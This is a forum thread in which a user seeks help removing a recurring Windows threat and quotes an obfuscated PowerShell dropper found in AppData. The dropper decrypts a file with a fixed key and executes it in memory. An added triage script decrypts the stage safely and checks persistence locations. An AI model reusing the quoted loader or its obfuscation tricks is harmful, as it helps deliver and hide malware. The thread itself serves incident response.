Forum Discussion

MarcoMangiante
Iron Contributor
Sep 08, 2021

Need help with suspicious "Behavior:Win32/SuspCopy.B"

Hello,

The system of a colleague is trying to block various attempts of the threat classified as "Behavior:Win32/SuspCopy.B". I found that the antivirus blocks it, but after some time it finds it again. The threat creates a random directory under the path C:\Users\[my colleague account]\AppData\Roaming; if I try, I can delete the files inside but not the directory. As a side effect, every time the antivirus finds a new attempt, a pop-up shows that a particular .tmp file is not found: the pop-up is a WSH pop-up, and I suppose a VBScript is executed when this issue occurs.

One of the files that I have found is a PowerShell script like this:

# Decoy try/catch blocks: "Cmdlet:Cmdlet" is not a valid command, so each try
# throws and control falls into its catch; the real body of the script is the
# catch block of this first try (it closes with the final "}}").
try{Import-Certificate:Import-StartLayout
Get-PSSessionConfiguration:Import-BinaryMiLog
Unregister-UevTemplate:Set-AppvPublishingServer}catch{

# Noise-stripping obfuscation: -replace with no replacement deletes every listed
# substring, which leaves the string "powershell".
$kJzClF="pGCbAoRKiYYwsyNMeGECrJorQrjClQsjjShbNHddeVmNKUleMplzOrlXvLi" -replace "QMO|GCbA|RKiYY|syNM|GECrJo|QrjClQ|jjS|bNHdd|VmNKU|eMplzOr|XvLi";
try{Add-AppxPackage:Enable-PSBreakpoint
Invoke-CommandInDesktopPackage:Get-RunspaceDebug
Clear-UevConfiguration:Debug-Process}catch{}
# Single-instance check: lists powershell.exe processes whose command line carries
# the marker "iXxpLQjg" and only continues if there is no second such process.
$NJeDKxLmAJtftkbNcthp=Get-WmiObject win32_process -Filter "name=""powershell.exe""" | where {$_.CommandLine -match "iXxpLQjg"};
if ($NJeDKxLmAJtftkbNcthp[1] -eq $null){
# Fixed key (bytes 1..16) used to decrypt "main.sh" from the current directory
# with ConvertTo-SecureString; the plaintext is then pulled back out via a BSTR.
$pAWzZWnnbaODWSIlGcI=@(1..16);
$wXXale=[System.Runtime.InteropServices.Marshal]
$FJZARstrPhaUvJ= Get-Content "main.sh"
$BkbxfgOkWGcdUJu= ConvertTo-SecureString $FJZARstrPhaUvJ -key $pAWzZWnnbaODWSIlGcI;
$qOXGbSpmuvBSmvlkW = $wXXale::SecureStringToBSTR($BkbxfgOkWGcdUJu);
try{Show-EventLog:Get-WheaMemoryPolicy
Get-NonRemovableAppsPolicy:Set-AppLockerPolicy
Set-AppxDefaultVolume:Disable-PSSessionConfiguration}catch{$upd='iXxpLQjg';}
$zApeVzJjF = $wXXale::PtrToStringAuto($qOXGbSpmuvBSmvlkW);
try{Write-Host:Publish-AppvClientPackage
Set-LocalUser:Invoke-WmiMethod
Set-WmiInstance:New-WindowsImage}catch{}
# Strip the marker from the decrypted text and run it in memory (Invoke-Expression).
$zApeVzJjF -replace "MJqsMVgvkpp" | iex;}}

I also tried to do a scan with Microsoft Security Scanner, but without success.

Does anyone have any idea how I could eradicate this threat?


--

Regards
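Editor's note: the script above does three things worth checking for by hand: it looks for a running copy of itself via Win32_Process, it decrypts a sibling file "main.sh" with a hard-coded key of bytes 1..16, and it runs the result with iex. The triage script below is an added example written for this page, not the poster's script and not a Microsoft tool. It assumes the encrypted stage is named "main.sh" next to the dropped .ps1, that the key is the literal 1..16 seen above, and that the marker removed before iex is "MJqsMVgvkpp". It recovers the plaintext stage to a .txt file instead of executing it, hashes the dropped files for the Defender investigation, and lists the usual user-level autostart locations (Run keys, scheduled tasks, Startup folder, WMI event consumers) so the re-creating component can be found.

```powershell
# Added triage example (editor-written, not from the original post or any vendor).
# Assumptions: "main.sh" sits beside the dropped .ps1, the key is bytes 1..16, and
# the marker stripped before iex is "MJqsMVgvkpp". Nothing here runs the decrypted stage.
[CmdletBinding()]
param(
    [string]$Root   = $env:APPDATA,                                  # AppData\Roaming, as in the post
    [string]$OutDir = "$env:USERPROFILE\Desktop\suspcopy-triage"     # where the evidence is written
)

function Get-DecryptedStage {
    # Mirrors the dropper's ConvertTo-SecureString / SecureStringToBSTR chain but
    # returns the plaintext instead of piping it to Invoke-Expression.
    param([Parameter(Mandatory)][string]$Path)
    $key  = [byte[]](1..16)                                   # fixed key taken from the script
    $blob = (Get-Content -Path $Path -Raw).Trim()
    $sec  = ConvertTo-SecureString -String $blob -Key $key
    $bstr = [System.Runtime.InteropServices.Marshal]::SecureStringToBSTR($sec)
    try     { [System.Runtime.InteropServices.Marshal]::PtrToStringAuto($bstr) -replace 'MJqsMVgvkpp' }
    finally { [System.Runtime.InteropServices.Marshal]::ZeroFreeBSTR($bstr) }
}

function Find-DropDirectories {
    # Every directory under Roaming that holds the encrypted stage.
    param([Parameter(Mandatory)][string]$Path)
    Get-ChildItem -Path $Path -Recurse -File -Filter 'main.sh' -ErrorAction SilentlyContinue |
        Select-Object -ExpandProperty DirectoryName -Unique
}

function Get-SuspiciousProcesses {
    # The same process query the dropper uses for its single-instance check, widened
    # to the script hosts that would produce the WSH pop-up mentioned in the post.
    Get-CimInstance Win32_Process -Filter "Name='powershell.exe' OR Name='wscript.exe' OR Name='cscript.exe'" |
        Select-Object ProcessId, ParentProcessId, Name, CommandLine
}

function Get-PersistenceCandidates {
    # User-level autostart locations that typically re-launch a dropper living in Roaming.
    $hits = [System.Collections.Generic.List[object]]::new()
    foreach ($key in 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Run',
                     'HKCU:\Software\Microsoft\Windows\CurrentVersion\RunOnce',
                     'HKLM:\Software\Microsoft\Windows\CurrentVersion\Run') {
        if (-not (Test-Path $key)) { continue }
        foreach ($p in (Get-ItemProperty -Path $key).PSObject.Properties) {
            if ($p.Name -notmatch '^PS' -and "$($p.Value)" -match 'Roaming|powershell|wscript|\.vbs|\.tmp') {
                $hits.Add([pscustomobject]@{ Type='RegistryRun'; Where=$key; What="$($p.Name) = $($p.Value)" })
            }
        }
    }
    foreach ($t in Get-ScheduledTask -ErrorAction SilentlyContinue) {
        foreach ($a in $t.Actions) {
            if ("$($a.Execute) $($a.Arguments)" -match 'Roaming|powershell|wscript|\.vbs') {
                $hits.Add([pscustomobject]@{ Type='ScheduledTask'; Where=($t.TaskPath + $t.TaskName); What="$($a.Execute) $($a.Arguments)" })
            }
        }
    }
    $startup = [Environment]::GetFolderPath('Startup')
    Get-ChildItem -Path $startup -File -ErrorAction SilentlyContinue | ForEach-Object {
        $hits.Add([pscustomobject]@{ Type='StartupFolder'; Where=$startup; What=$_.Name })
    }
    # WMI event subscriptions survive file deletion and are easy to miss.
    Get-CimInstance -Namespace root/subscription -ClassName __EventConsumer -ErrorAction SilentlyContinue | ForEach-Object {
        $hits.Add([pscustomobject]@{ Type='WmiConsumer'; Where=$_.CimClass.CimClassName; What=$_.Name })
    }
    $hits
}

New-Item -ItemType Directory -Path $OutDir -Force | Out-Null
$dirs = @(Find-DropDirectories -Path $Root)
foreach ($d in $dirs) {
    # Hash the dropped files for the Defender/ATP case, then recover the stage offline.
    Get-ChildItem -Path $d -File | Get-FileHash -Algorithm SHA256 |
        Export-Csv -Path (Join-Path $OutDir 'hashes.csv') -Append -NoTypeInformation
    try {
        $stage = Get-DecryptedStage -Path (Join-Path $d 'main.sh')
        $name  = (Split-Path $d -Leaf) + '.decrypted.ps1.txt'      # .txt so nothing runs it by accident
        Set-Content -Path (Join-Path $OutDir $name) -Value $stage
    } catch { Write-Warning "Could not decrypt $d\main.sh: $($_.Exception.Message)" }
}
Get-SuspiciousProcesses   | Export-Csv -Path (Join-Path $OutDir 'processes.csv')   -NoTypeInformation
Get-PersistenceCandidates | Export-Csv -Path (Join-Path $OutDir 'persistence.csv') -NoTypeInformation
Write-Host "Triage written to $OutDir; drop directories found: $($dirs -join ', ')"
```

Run it in a non-elevated PowerShell as the affected user so the HKCU and Startup-folder checks see her profile; the decrypted .txt files are what to read to learn what the stage actually does, and the persistence.csv entry that points at a .vbs or .tmp under Roaming is the component to remove before deleting the directories.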

  • rs8091
    Copper Contributor
    Interesting, does your colleague know the source of the script? Are you able to quarantine the file from the Defender ATP console?
    • MarcoMangiante
      Iron Contributor

      Hello rs8091 

      No, my colleague doesn't know how her system was infected. We activated the preview of Microsoft Defender Endpoint P1 and I can see this:


      These are not generated by that file, but I have seen that in many of the random directories that the threat creates there is always a PowerShell file with that code inside.

      I don't know if I can quarantine it.

      Any help is appreciated.


      Thanks.
